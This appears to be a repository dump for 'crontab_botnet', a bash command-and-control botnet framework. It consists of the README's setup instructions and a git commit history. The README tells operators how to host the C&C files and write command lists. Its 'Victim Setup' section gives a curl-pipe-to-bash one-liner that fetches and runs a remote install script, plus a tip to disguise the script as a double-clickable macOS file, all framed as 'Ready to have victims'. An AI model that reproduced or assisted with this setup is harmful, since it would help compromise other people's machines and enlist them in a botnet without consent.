======================: FILES :======================
======================: README CONTENT :======================
# crontab_botnet
A botnet (C&amp;C) framework that create in bash and using crontab for periodic execute

## Server Side Setup (Plain Text Version)
1. Put the folder under any kind of web server, which can be, but not limited to:
```
IIS
Nginx
Apache
Python Simple HTTP Server
```
2. Change the domain and path in `install.sh` and `bd.sh`.
3. follow the instrustion for writing a command file
4. Ready to have victims

## Server Side Setup (With PHP uploader)
1. Setup a LAMP server.
2. Put the file to a folder which can be accessed on the network.
3. Change the domain and path in `install.sh` and `bd.sh`.
4. follow the instrustion for writing a command file
5. Ready to have victims

## Victim Setup
- `curl http://example.com/install.sh | bash`
- You can also rename the file install.sh to install.command, and double-click the file on OS X system to execute it.

## Command File
The name of command file is `command_list`, there is a simple command list call `command_list_example`.
You can change the domain and path in the example file, and feel free to use it.
====================== GIT HISTORY: ======================
1177925 HEAD@{0}: clone: from https://github.com/seadog007/crontab_botnet
commit 1177925ba03fd7c2950765f476157d168b44678c
Author: seadog007 <007seadog@gmail.com>
Date:   Thu Aug 17 23:13:14 2017 +0000

    Added uploads folder

commit 132cd798c75e4c119cbb660bc09b3cea22955887
Author: seadog007 <007seadog@gmail.com>
Date:   Thu Aug 17 23:12:25 2017 +0000

    Added upload.php

commit d7334c66859cfb7e1d0b6990d1bbe607792aae6f
Author: seadog007 <007seadog@gmail.com>
Date:   Thu Aug 17 23:12:10 2017 +0000

    Added the example of command list

commit ad65945ad39e8fb46b22c712b1dbb01c6870173a
Author: 海豹 <007seadog@gmail.com>
Date:   Thu Aug 17 06:27:21 2017 +0800

    Create README.md

commit 13179e624ba019071155f3d3d55923dc31b8b532
Author: 海豹 <007seadog@gmail.com>
Date:   Thu Aug 17 06:15:23 2017 +0800

    Create LICENSE

commit 43d5cddb717737d03c43457316c24ed2ef6ccf10
Author: seadog007 <007seadog@gmail.com>
Date:   Wed Aug 16 15:49:27 2017 +0000

    Disable log function for default

commit 3a23a9adc5264564d8c985c4014780591ebcc2c8
Author: seadog007 <007seadog@gmail.com>
Date:   Wed Aug 16 15:29:47 2017 +0000

    Added empty file for preventing dir list

commit ee75e2d64e99bf6eb912efcff2a97217bd273778
Author: seadog007 <007seadog@gmail.com>
Date:   Wed Aug 16 15:24:27 2017 +0000

    Added install.sh

commit a3c80870ef18b8a9e160888923856aa88db52ab9
Author: seadog007 <007seadog@gmail.com>
Date:   Wed Aug 16 15:14:48 2017 +0000

    Added core script
